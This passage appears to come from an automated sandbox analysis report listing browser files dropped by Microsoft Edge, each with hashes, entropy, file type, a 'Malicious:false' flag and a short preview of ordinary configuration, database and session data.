                                                                                                                                                                                                                                                                                          SHA-512:B25B294CB4DEB69EA00A4C3CF3113904801B6015E5956BD019A8570B1FE1D6040E944EF3CDEE16D0A46503CA6E659A25F21CF9CEDDC13F352A3C98138C15D6AF
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          Preview:[]
                                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                          File Type:JSON data
                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                          Size (bytes):2
                                                                                                                                                                                                                                                                                          Entropy (8bit):1.0
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:3:H:H
                                                                                                                                                                                                                                                                                          MD5:D751713988987E9331980363E24189CE
                                                                                                                                                                                                                                                                                          SHA1:97D170E1550EEE4AFC0AF065B78CDA302A97674C
                                                                                                                                                                                                                                                                                          SHA-256:4F53CDA18C2BAA0C0354BB5F9A3ECBE5ED12AB4D8E11BA873C2F11161202B945
                                                                                                                                                                                                                                                                                          SHA-512:B25B294CB4DEB69EA00A4C3CF3113904801B6015E5956BD019A8570B1FE1D6040E944EF3CDEE16D0A46503CA6E659A25F21CF9CEDDC13F352A3C98138C15D6AF
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          Preview:[]
                                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                          File Type:JSON data
                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                          Size (bytes):40
                                                                                                                                                                                                                                                                                          Entropy (8bit):4.1275671571169275
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:3:Y2ktGMxkAXWMSN:Y2xFMSN
                                                                                                                                                                                                                                                                                          MD5:20D4B8FA017A12A108C87F540836E250
                                                                                                                                                                                                                                                                                          SHA1:1AC617FAC131262B6D3CE1F52F5907E31D5F6F00
                                                                                                                                                                                                                                                                                          SHA-256:6028BD681DBF11A0A58DDE8A0CD884115C04CAA59D080BA51BDE1B086CE0079D
                                                                                                                                                                                                                                                                                          SHA-512:507B2B8A8A168FF8F2BDAFA5D9D341C44501A5F17D9F63F3D43BD586BC9E8AE33221887869FA86F845B7D067CB7D2A7009EFD71DDA36E03A40A74FEE04B86856
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          Preview:{"SDCH":{"dictionaries":{},"version":2}}
                                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                          File Type:JSON data
                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                          Size (bytes):2
                                                                                                                                                                                                                                                                                          Entropy (8bit):1.0
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:3:H:H
                                                                                                                                                                                                                                                                                          MD5:D751713988987E9331980363E24189CE
                                                                                                                                                                                                                                                                                          SHA1:97D170E1550EEE4AFC0AF065B78CDA302A97674C
                                                                                                                                                                                                                                                                                          SHA-256:4F53CDA18C2BAA0C0354BB5F9A3ECBE5ED12AB4D8E11BA873C2F11161202B945
                                                                                                                                                                                                                                                                                          SHA-512:B25B294CB4DEB69EA00A4C3CF3113904801B6015E5956BD019A8570B1FE1D6040E944EF3CDEE16D0A46503CA6E659A25F21CF9CEDDC13F352A3C98138C15D6AF
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          Preview:[]
                                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                          File Type:JSON data
                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                          Size (bytes):40
                                                                                                                                                                                                                                                                                          Entropy (8bit):4.1275671571169275
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:3:Y2ktGMxkAXWMSN:Y2xFMSN
                                                                                                                                                                                                                                                                                          MD5:20D4B8FA017A12A108C87F540836E250
                                                                                                                                                                                                                                                                                          SHA1:1AC617FAC131262B6D3CE1F52F5907E31D5F6F00
                                                                                                                                                                                                                                                                                          SHA-256:6028BD681DBF11A0A58DDE8A0CD884115C04CAA59D080BA51BDE1B086CE0079D
                                                                                                                                                                                                                                                                                          SHA-512:507B2B8A8A168FF8F2BDAFA5D9D341C44501A5F17D9F63F3D43BD586BC9E8AE33221887869FA86F845B7D067CB7D2A7009EFD71DDA36E03A40A74FEE04B86856
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          Preview:{"SDCH":{"dictionaries":{},"version":2}}
                                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                          File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 3, database pages 5, cookie 0x2, schema 4, UTF-8, version-valid-for 3
                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                          Size (bytes):20480
                                                                                                                                                                                                                                                                                          Entropy (8bit):0.8350301952073809
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:24:TLSOUOq0afDdWec9sJlAMoqsgC7zn2z8ZI7J5fc:T+OUzDbg3sAM/sgCnn2ztc
                                                                                                                                                                                                                                                                                          MD5:0DAD8D7F079797377CD56DAE47E1A619
                                                                                                                                                                                                                                                                                          SHA1:A353C01C5B9BA9E0315ABA74D3337B7D6EE97CB2
                                                                                                                                                                                                                                                                                          SHA-256:7BDA584E0C1BE9E104065370FD279A7E771D7EB4F7E4CC7C80F146931F150E33
                                                                                                                                                                                                                                                                                          SHA-512:5A57C0D303672564DDEAA08B5DAAEE1BA24B67C46100720CE69F0908427ACE55F330D96A772D0E1F96B595FBBD70E6145AA464FC4F312EFE095F9AC909E304E8
                                                                                                                                                                                                                                                                                          Malicious:false
Preview:SQLite format 3......@ ...
                                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                          File Type:JSON data
                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                          Size (bytes):9573
                                                                                                                                                                                                                                                                                          Entropy (8bit):5.109781454570743
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:192:stAkdpUsyByyaNP9ko9K8TbV+Fl3QAt7HPkiYJ:stAQUsyQtJbbGZQSK
                                                                                                                                                                                                                                                                                          MD5:03FA061F3B4BA77E1D61C9C52D66EE53
                                                                                                                                                                                                                                                                                          SHA1:4DB2AB5F7960C44D7313999400D7AAB84BD411D9
                                                                                                                                                                                                                                                                                          SHA-256:D021CA34E3106E9F7B3285D6C5A15480367967F277590649FC2B1FC7EB80F85C
                                                                                                                                                                                                                                                                                          SHA-512:C19B43383BA2FC229D941C6BD9116CA0D0BA1E380015F5F4087B5C58AE3A1993422958BC8B35BB6239A9BD1E6526333CE16E66D077A16D2652E0EB6B8C2DA8A6
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          Preview:{"aadc_info":{"age_group":0},"account_tracker_service_last_update":"13379071553255015","alternate_error_pages":{"backup":true},"apps":{"shortcuts_arch":"","shortcuts_version":0},"arbitration_experiences":{},"arbitration_local_nsat_reset_time":"13340965831357520","arbitration_using_experiment_config":false,"autocomplete":{"retention_policy_last_version":117},"browser":{"available_dark_theme_options":"All","has_seen_welcome_page":false,"should_reset_check_default_browser":false,"toolbar_extensions_hub_button_visibility":0,"underside_chat_bing_signed_in_status":false,"window_placement":{"bottom":974,"left":10,"maximized":true,"right":1060,"top":10,"work_area_bottom":984,"work_area_left":0,"work_area_right":1280,"work_area_top":0}},"browser_content_container_height":882,"browser_content_container_width":1236,"browser_content_container_x":0,"browser_content_container_y":102,"continuous_migration":{"ci_correction_for_holdout_treatment_state":1,"datatype_details_migration_performed":true},"co
                                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                          File Type:JSON data
                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                          Size (bytes):25012
                                                                                                                                                                                                                                                                                          Entropy (8bit):5.567639435794489
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:768:i6bUhjWPLLfXq8F1+UoAYDCx9Tuqh0VfUC9xbog/OVaLTPVrw7pOtuR:i6bUhjWPLLfXqu1jabvPeAtG
                                                                                                                                                                                                                                                                                          MD5:5DD00C3354A01EC760C751D472E5B7E8
                                                                                                                                                                                                                                                                                          SHA1:F8DA696FA400BAEAE0199280A3745FC064C5828C
                                                                                                                                                                                                                                                                                          SHA-256:8B7E9CC909178CC1AB72AD4C5CA8B72EB11081682750CC16CB76126BB0403D99
                                                                                                                                                                                                                                                                                          SHA-512:B027DA16B57278567DA8E0DE90BE0385803A2ACD0B0039DE7AA8A6FB325B9774FECF1AE6E39F8DC39B86DC625D8740397557DD1CB9D75E1F567BB6E9E90891B9
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          Preview:{"edge_fundamentals_appdefaults":{"ess_lightweight_version":101},"ess_kv_states":{"restore_on_startup":{"closed_notification":false,"decrypt_success":true,"key":"restore_on_startup","notification_popup_count":0},"startup_urls":{"closed_notification":false,"decrypt_success":true,"key":"startup_urls","notification_popup_count":0},"template_url_data":{"closed_notification":false,"decrypt_success":true,"key":"template_url_data","notification_popup_count":0}},"extensions":{"settings":{"ahfgeienlihckogmohjhadlkjgocpleb":{"active_permissions":{"api":["management","system.display","system.storage","webstorePrivate","system.cpu","system.memory","system.network"],"explicit_host":[],"manifest_permissions":[],"scriptable_host":[]},"app_launcher_ordinal":"t","commands":{},"content_settings":[],"creation_flags":1,"events":[],"first_install_time":"13379071552709354","from_webstore":false,"incognito_content_settings":[],"incognito_preferences":{},"last_update_time":"13379071552709354","location":5,"ma
                                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                          File Type:JSON data
                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                          Size (bytes):25012
                                                                                                                                                                                                                                                                                          Entropy (8bit):5.567639435794489
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:768:i6bUhjWPLLfXq8F1+UoAYDCx9Tuqh0VfUC9xbog/OVaLTPVrw7pOtuR:i6bUhjWPLLfXqu1jabvPeAtG
                                                                                                                                                                                                                                                                                          MD5:5DD00C3354A01EC760C751D472E5B7E8
                                                                                                                                                                                                                                                                                          SHA1:F8DA696FA400BAEAE0199280A3745FC064C5828C
                                                                                                                                                                                                                                                                                          SHA-256:8B7E9CC909178CC1AB72AD4C5CA8B72EB11081682750CC16CB76126BB0403D99
                                                                                                                                                                                                                                                                                          SHA-512:B027DA16B57278567DA8E0DE90BE0385803A2ACD0B0039DE7AA8A6FB325B9774FECF1AE6E39F8DC39B86DC625D8740397557DD1CB9D75E1F567BB6E9E90891B9
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          Preview:{"edge_fundamentals_appdefaults":{"ess_lightweight_version":101},"ess_kv_states":{"restore_on_startup":{"closed_notification":false,"decrypt_success":true,"key":"restore_on_startup","notification_popup_count":0},"startup_urls":{"closed_notification":false,"decrypt_success":true,"key":"startup_urls","notification_popup_count":0},"template_url_data":{"closed_notification":false,"decrypt_success":true,"key":"template_url_data","notification_popup_count":0}},"extensions":{"settings":{"ahfgeienlihckogmohjhadlkjgocpleb":{"active_permissions":{"api":["management","system.display","system.storage","webstorePrivate","system.cpu","system.memory","system.network"],"explicit_host":[],"manifest_permissions":[],"scriptable_host":[]},"app_launcher_ordinal":"t","commands":{},"content_settings":[],"creation_flags":1,"events":[],"first_install_time":"13379071552709354","from_webstore":false,"incognito_content_settings":[],"incognito_preferences":{},"last_update_time":"13379071552709354","location":5,"ma
                                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                          File Type:ASCII text
                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                          Size (bytes):16
                                                                                                                                                                                                                                                                                          Entropy (8bit):3.2743974703476995
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:3:1sjgWIV//Uv:1qIFUv
                                                                                                                                                                                                                                                                                          MD5:46295CAC801E5D4857D09837238A6394
                                                                                                                                                                                                                                                                                          SHA1:44E0FA1B517DBF802B18FAF0785EEEA6AC51594B
                                                                                                                                                                                                                                                                                          SHA-256:0F1BAD70C7BD1E0A69562853EC529355462FCD0423263A3D39D6D0D70B780443
                                                                                                                                                                                                                                                                                          SHA-512:8969402593F927350E2CEB4B5BC2A277F3754697C1961E3D6237DA322257FBAB42909E1A742E22223447F3A4805F8D8EF525432A7C3515A549E984D3EFF72B23
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          Preview:MANIFEST-000001.
                                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                          File Type:data
                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                          Size (bytes):2394
                                                                                                                                                                                                                                                                                          Entropy (8bit):5.81916591870255
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:24:F2xc5NmHcncmoDCRORpllg2hETfRHUgldCRORpllg2hL0YNwFCRORpllg2hEWRHk:F2emoMrd6TfBzrd5RQrd6WB4rdABu
                                                                                                                                                                                                                                                                                          MD5:8682D06B616D2EBCD1B66DDB1E7D9729
                                                                                                                                                                                                                                                                                          SHA1:DD03E9970D5976FA63C4A770E5AF6DB56150991A
                                                                                                                                                                                                                                                                                          SHA-256:95FC8B0DA3E1654B7A9B98A976DE79DBBBFE524FEE6AFECA1DDA5AC5DC9F44EE
                                                                                                                                                                                                                                                                                          SHA-512:368A54F0FEDF60ECAB1CFB2DFD7D21D545EA531C9A4FD156DF5D3913E486D894EA8287D8BB194328B3C8F0FD487DC7698E3D4B0113176DDA994FE7FA4C13463A
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                          File Type:ASCII text
                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                          Size (bytes):305
                                                                                                                                                                                                                                                                                          Entropy (8bit):5.176589151372698
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:6:78R46ZR1cNwi23oH+TcwtE/a252KLlp8R44K+q2PcNwi23oH+TcwtE/a2ZIFUv:7eZ/ZYeb8xLTovLZYeb8J2FUv
                                                                                                                                                                                                                                                                                          MD5:E34291F4548000FDE0CAAF8662537E29
                                                                                                                                                                                                                                                                                          SHA1:669FED35D85049CC6797C19AB5FA8FC1B9FAE451
                                                                                                                                                                                                                                                                                          SHA-256:9DCE2A7A7D355BED6DC06F60F8B023980DAB378F1301AFFF8418905ABC2BE948
                                                                                                                                                                                                                                                                                          SHA-512:7A4AD549D2E982C036688226AED395899F9FAE5D6E7DA87A192A8D0D242959E7C5DCE90C5EC8FAC96E697F07764919CB3A18C4C4A2E16C0922FCB755762718A9
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          Preview:2024/12/19-03:46:10.815 19e8 Creating DB C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\Database since it was missing..2024/12/19-03:46:10.830 19e8 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\Database/MANIFEST-000001.
                                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                          File Type:OpenPGP Secret Key
                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                          Size (bytes):41
                                                                                                                                                                                                                                                                                          Entropy (8bit):4.704993772857998
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:3:scoBAIxQRDKIVjn:scoBY7jn
                                                                                                                                                                                                                                                                                          MD5:5AF87DFD673BA2115E2FCF5CFDB727AB
                                                                                                                                                                                                                                                                                          SHA1:D5B5BBF396DC291274584EF71F444F420B6056F1
                                                                                                                                                                                                                                                                                          SHA-256:F9D31B278E215EB0D0E9CD709EDFA037E828F36214AB7906F612160FEAD4B2B4
                                                                                                                                                                                                                                                                                          SHA-512:DE34583A7DBAFE4DD0DC0601E8F6906B9BC6A00C56C9323561204F77ABBC0DC9007C480FFE4092FF2F194D54616CAF50AECBD4A1E9583CAE0C76AD6DD7C2375B
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          Preview:.|.."....leveldb.BytewiseComparator......
                                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                          File Type:data
                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                          Size (bytes):114579
                                                                                                                                                                                                                                                                                          Entropy (8bit):5.57812137291716
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:1536:kU906yxPXfOxr1lhCe1nL/ImL/rBZXECjPXNtGfki7QpRea+/:J9LyxPXfOxr1lMe1nL/5L/TXE6U7WK
                                                                                                                                                                                                                                                                                          MD5:B84EBE8170E5C9F36F27B55468E66503
                                                                                                                                                                                                                                                                                          SHA1:94D121272B13FF67BE7FC8113518303C70915931
                                                                                                                                                                                                                                                                                          SHA-256:7EF10054133F53A0A358EE0596CF0DFF9E6D6546657DAEA52CB9C3C602DE4AE4
                                                                                                                                                                                                                                                                                          SHA-512:0A64ED6CF95181F65600A3DD4A40DB62FEB99D3C58BCD0A24C6036EA9E922E5396D82D5E439D3D1F8D107BDAE806304BA2BBB72A9D99B61767C7C9011AF4372A
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                          File Type:data
                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                          Size (bytes):189105
                                                                                                                                                                                                                                                                                          Entropy (8bit):6.38662863899425
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:3072:D0RygsG8AvWZwDPpIQz4o5L/h2TgKlvcWC0MHEGVb0QUDEL5:HjZwD6QNL/kElWgF5
                                                                                                                                                                                                                                                                                          MD5:5521F57EBEF8D7ADCD091770905123B0
                                                                                                                                                                                                                                                                                          SHA1:66FE42909697E7AC16164A1BCE4C04178ECF758F
                                                                                                                                                                                                                                                                                          SHA-256:C0F057CE82EADBFDB3BAB77254F61927C00B713B421AD7A452BC79557F91AE14
                                                                                                                                                                                                                                                                                          SHA-512:C8C480F72F3481EA180DCCA9732F83422B959D6468679B0D5771390EFEED0090DF68ABB3831639518BD94629A2DA3E7A0A2653D846F6A2CEF6D9240CF694D287
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                          File Type:data
                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                          Size (bytes):24
                                                                                                                                                                                                                                                                                          Entropy (8bit):2.1431558784658327
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:3:m+l:m
                                                                                                                                                                                                                                                                                          MD5:54CB446F628B2EA4A5BCE5769910512E
                                                                                                                                                                                                                                                                                          SHA1:C27CA848427FE87F5CF4D0E0E3CD57151B0D820D
                                                                                                                                                                                                                                                                                          SHA-256:FBCFE23A2ECB82B7100C50811691DDE0A33AA3DA8D176BE9882A9DB485DC0F2D
                                                                                                                                                                                                                                                                                          SHA-512:8F6ED2E91AED9BD415789B1DBE591E7EAB29F3F1B48FDFA5E864D7BF4AE554ACC5D82B4097A770DABC228523253623E4296C5023CF48252E1B94382C43123CB0
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          Preview:0\r..m..................
                                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                          File Type:data
                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                          Size (bytes):72
                                                                                                                                                                                                                                                                                          Entropy (8bit):3.5376346459829513
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:3:xiXl/lYV/lxEstllQUDUtKln:MYWs+UDU4l
                                                                                                                                                                                                                                                                                          MD5:B13AA883C2012823BD512FEA13A7BE23
                                                                                                                                                                                                                                                                                          SHA1:8EE3BA0F1CB4C060080119729AA2B4BA6CA2C13C
                                                                                                                                                                                                                                                                                          SHA-256:5E9DEB9F27ABCFE626B6054200D6ED1A8F41008D20D0E59D035ECBB0222C593E
                                                                                                                                                                                                                                                                                          SHA-512:34FBC5AC8BE03DD8CB38E4DF936A3ED0898962B9E0A1268D6853B9259FB94D1C4EDBDA5E1109D33BF72A5C050E4A03503661AB069D8C49ECC653ACFA69ACEAD6
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          Preview:@...D..oy retne.........................X....,..................t.1./.
                                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                          File Type:data
                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                          Size (bytes):72
                                                                                                                                                                                                                                                                                          Entropy (8bit):3.5376346459829513
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:3:xiXl/lYV/lxEstllQUDUtKln:MYWs+UDU4l
                                                                                                                                                                                                                                                                                          MD5:B13AA883C2012823BD512FEA13A7BE23
                                                                                                                                                                                                                                                                                          SHA1:8EE3BA0F1CB4C060080119729AA2B4BA6CA2C13C
                                                                                                                                                                                                                                                                                          SHA-256:5E9DEB9F27ABCFE626B6054200D6ED1A8F41008D20D0E59D035ECBB0222C593E
                                                                                                                                                                                                                                                                                          SHA-512:34FBC5AC8BE03DD8CB38E4DF936A3ED0898962B9E0A1268D6853B9259FB94D1C4EDBDA5E1109D33BF72A5C050E4A03503661AB069D8C49ECC653ACFA69ACEAD6
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          Preview:@...D..oy retne.........................X....,..................t.1./.
                                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                          File Type:data
                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                          Size (bytes):72
                                                                                                                                                                                                                                                                                          Entropy (8bit):3.5376346459829513
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:3:xiXl/lYV/lxEstllQUDUtKln:MYWs+UDU4l
                                                                                                                                                                                                                                                                                          MD5:B13AA883C2012823BD512FEA13A7BE23
                                                                                                                                                                                                                                                                                          SHA1:8EE3BA0F1CB4C060080119729AA2B4BA6CA2C13C
                                                                                                                                                                                                                                                                                          SHA-256:5E9DEB9F27ABCFE626B6054200D6ED1A8F41008D20D0E59D035ECBB0222C593E
                                                                                                                                                                                                                                                                                          SHA-512:34FBC5AC8BE03DD8CB38E4DF936A3ED0898962B9E0A1268D6853B9259FB94D1C4EDBDA5E1109D33BF72A5C050E4A03503661AB069D8C49ECC653ACFA69ACEAD6
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          Preview:@...D..oy retne.........................X....,..................t.1./.
                                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                          File Type:data
                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                          Size (bytes):6287
                                                                                                                                                                                                                                                                                          Entropy (8bit):3.386904174834143
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:192:xmIaEGmT0sCH9Xp+LDTiADiLl9iSrWThQYH:xmRmTs9Xp+jOLl9iSrSBH
                                                                                                                                                                                                                                                                                          MD5:3EE0455CD8BA14FB5DE935B46CC419C1
                                                                                                                                                                                                                                                                                          SHA1:B25C9069B2F59EC2F0355545796E58AC3C49C508
                                                                                                                                                                                                                                                                                          SHA-256:570601CA34D6D97BEC6ED3A7FF56940B28A8110976B6897F320FB27A5443AB16
                                                                                                                                                                                                                                                                                          SHA-512:EBF4F5F800BEA9A1FC2B4607D22FD94B090337C29D0CDF17F944C3488E7A2458FD7211394EE770E0B8E56B5422A5A205CBEA40856EBA16AB22835CC7171E87DC
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                          File Type:ASCII text
                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                          Size (bytes):327
                                                                                                                                                                                                                                                                                          Entropy (8bit):5.24070437484559
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:6:78Roq+q2PcNwi23oH+TcwtrQMxIFUt8O8RoQZmw+O8RokVkwOcNwi23oH+Tcwtrb:7pLvLZYebCFUt8OpQ/+Opk54ZYebtJ
                                                                                                                                                                                                                                                                                          MD5:5959BF52E1C9AF89913702A0797BDBCA
                                                                                                                                                                                                                                                                                          SHA1:777BC01C4404097DC6274AF0C37C55EACB41B385
                                                                                                                                                                                                                                                                                          SHA-256:4FBFB52A48A22309AB437ED87B45F7685139B1CE37C75922ABA2C0C2A4890153
                                                                                                                                                                                                                                                                                          SHA-512:931AB48592A9617CC0FA92697851AEA5F5BA1F1AFFD273B28135F8C6765552C6E994739B4CE8BB1E5BA2D3525F2D0D4EE3461DC0C8D2FCC21019B421E8AAF224
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          Preview:2024/12/19-03:45:53.563 788 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Session Storage/MANIFEST-000001.2024/12/19-03:45:53.569 788 Recovering log #3.2024/12/19-03:45:53.572 788 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Session Storage/000003.log .
                                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                          File Type:data
                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                          Size (bytes):1443
                                                                                                                                                                                                                                                                                          Entropy (8bit):3.8075574854030916
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:24:38Uhv824WRHWZ4psAF4unxYtLp3X2amEtG1Chq5WLLNQ8lIHbQKkOAM4O4:38iE6RZzF2Lp2FEkChQWfxVHOp74
                                                                                                                                                                                                                                                                                          MD5:D24AC2C54B2ECBD1CF6A56D745BCC077
                                                                                                                                                                                                                                                                                          SHA1:10F1B4EA43C879EBE5C997BD313FB71150EEBE62
                                                                                                                                                                                                                                                                                          SHA-256:BDC61D63960186CA37EB2E4A827ADE6474E37BA45907F799B47E5D3B9DF779FE
                                                                                                                                                                                                                                                                                          SHA-512:EEEEB604AEC8337A09BA7102A59713839E0557EF76DA0ED1713673104FF1EA1A3AFB7800A89D4D8B3C8E139DBF00FA4BEDB6912292AB05D18E0781E569FEE29C
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          Preview:SNSS.......2.bv...........2.bv......"2.bv...........2.bv.......2.bv.......3.bv.......3.bv....!..3.bv...............................2.bv3.bv1..,...3.bv$...f75a3bdb_b60d_4494_84ee_75743b465b1a...2.bv.......3.bv...............2.bv...2.bv.......................2.bv....................5..0...2.bv&...{4B3AC14B-43E5-4896-86E8-9E7D502CE1B5}.....2.bv.......2.bv..........................3.bv...........3.bv........edge://newtab/......N.e.w. .t.a.b...........!...............................................................x...............................x.......Z....)..[....).................................. ...................................................r...h.t.t.p.s.:././.n.t.p...m.s.n...c.o.m./.e.d.g.e./.n.t.p.?.l.o.c.a.l.e.=.e.n.-.G.B.&.t.i.t.l.e.=.N.e.w.%.2.0.t.a.b.&.d.s.p.=.1.&.s.p.=.B.i.n.g.&.i.s.F.R.E.M.o.d.a.l.B.a.c.k.g.r.o.u.n.d.=.1.&.s.t.a.r.t.p.a.g.e.=.1.&.P.C.=.U.5.3.1.....................................8.......0.......8............................................................
                                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
